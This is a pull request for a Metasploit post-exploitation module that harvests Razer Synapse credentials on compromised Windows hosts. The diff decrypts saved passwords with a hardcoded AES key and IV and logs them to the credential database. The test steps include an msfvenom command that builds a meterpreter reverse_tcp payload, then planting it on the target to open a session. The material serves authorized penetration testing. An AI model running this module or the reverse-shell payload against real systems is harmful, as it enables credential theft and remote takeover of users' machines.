### PR TITLE
Update razer_synapse to use the new cred API

### DIFF
--- a/modules/post/windows/gather/credentials/razer_synapse.rb
+++ b/modules/post/windows/gather/credentials/razer_synapse.rb
@@ -38,59 +38,74 @@ class Metasploit3 < Msf::Post
     ))
   end
 
+  def is_base64?(str)
+    str.match(/^([A-Za-z0-9+\/]{4})*([A-Za-z0-9+\/]{4}|[A-Za-z0-9+\/]{3}=|[A-Za-z0-9+\/]{2}==)$/) ? true : false
+  end
+
   # decrypt password
-  def decrypt(hash)
+  def decrypt(pass)
+    pass = Rex::Text.decode_base64(pass) if is_base64?(pass)
     cipher = OpenSSL::Cipher::Cipher.new 'aes-256-cbc'
     cipher.decrypt
     cipher.key = "hcxilkqbbhczfeultgbskdmaunivmfuo"
     cipher.iv = "ryojvlzmdalyglrj"
 
-    hash.each_pair { |user,pass|
-      pass = pass.unpack("m")[0]
+    pass = pass.unpack("m")[0]
+    password = cipher.update pass
+    password << cipher.final
 
-      password = cipher.update pass
-      password << cipher.final rescue return nil
-
-      store_creds(user, password.split("||")[1])
-      print_good("Found credentials")
-      print_good("\tUser: #{user}")
-      print_good("\tPassword: #{password.split("||")[1]}")
-    }
+    password
   end
 
-  def store_creds(user, pass)
-    if db
-      report_auth_info(
-        :host   => Rex::Socket.resolv_to_dotted("www.razerzone.com"),
-        :port   => 443,
-        :ptype  => 'password',
-        :sname  => 'razer_synapse',
-        :user   => user,
-        :pass   => pass,
-        :duplicate_ok => true,
-        :active => true
-      )
-      vprint_status("Loot stored in the db")
-    end
+  def report_cred(opts)
+    service_data = {
+      address: opts[:ip],
+      port: opts[:port],
+      service_name: opts[:service_name],
+      protocol: 'tcp',
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
+      username: opts[:user]
+    }.merge(service_data)
+
+    login_data = {
+      core: create_credential(credential_data),
+      status: Metasploit::Model::Login::Status::UNTRIED,
+    }.merge(service_data)
+
+    create_credential_login(login_data)
   end
 
   # Loop throuhg config, grab user and pass
-  def parse_config(config)
-    if not config =~ /<Version>\d<\/Version>/
-      creds = {}
-      cred_group = config.split("</SavedCredentials>")
-      cred_group.each { |cred|
-        user = /<Username>([^<]+)<\/Username>/.match(cred)
-        pass = /<Password>([^<]+)<\/Password>/.match(cred)
-        if user and pass
-          creds[user[1]] = pass[1]
-        end
-      }
-      return creds
-    else
-      print_error("Module only works against configs from version < 1.7.15")
-      return nil
+  def get_creds(config)
+    creds = {}
+
+    return nil if !config.include?('<Version>')
+
+    xml = ::Nokogiri::XML(config)
+    xml.xpath('//SavedCredentials').each do |node|
+      user = node.xpath('Username').text
+      pass = node.xpath('Password').text
+      begin
+        pass = decrypt(pass)
+      rescue OpenSSL::Cipher::CipherError
+        # Eh, ok. We tried.
+      end
+      creds[user] = pass
     end
+
+    creds
+  end
+
+  def razerzone_ip
+    @razerzone_ip ||= Rex::Socket.resolv_to_dotted("www.razerzone.com")
   end
 
   # main control method
@@ -104,11 +119,18 @@ class Metasploit3 < Msf::Post
         contents = read_file(accounts)
 
         # read the contents of file
-        creds = parse_config(contents)
-        if creds
-          decrypt(creds)
-        else
-          print_error("Could not read config or empty for #{user['UserName']}")
+        creds = get_creds(contents)
+        unless creds.empty?
+          creds.each_pair do |user, pass|
+            print_good("Found cred: #{user}:#{pass}")
+            report_cred(
+              ip: razerzone_ip,
+              port: 443,
+              service_name: 'http',
+              user: user,
+              password: pass
+            )
+          end
         end
       end
     end


### PR DESCRIPTION
This patch updates the razer_synapse post module to use the new credential API.
- [x] Get a Windows 7 box
- [x] Install [Razer Synpase](https://razerdrivers.s3.amazonaws.com/drivers/Synapse2/win/Razer_Synapse_Framework_V1.18.21.26027.exe)
- [x] Create a new account with them via the client
- [x] You will need to check your e-mail and validate the account
- [x] Go ahead and login with your account
- [x] Start msfconsole
- [x] Do: `workspace -a razer`
- [x] Do: `use exploit/multi/handler`
- [x] Do: `run`
- [x] Create a payload exe: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/payload.exe`
- [x] Drag and drop the payload exe to the Windows box, and get a session
- [x] At the meterpreter prompt, do: `run post/windows/gather/credentials/razer_synapse`
- [x] You should see the cred (or creds)
- [x] At the meterpreter prompt, do: `background`
- [x] Do: `creds`
- [x] You should see your cred(s)
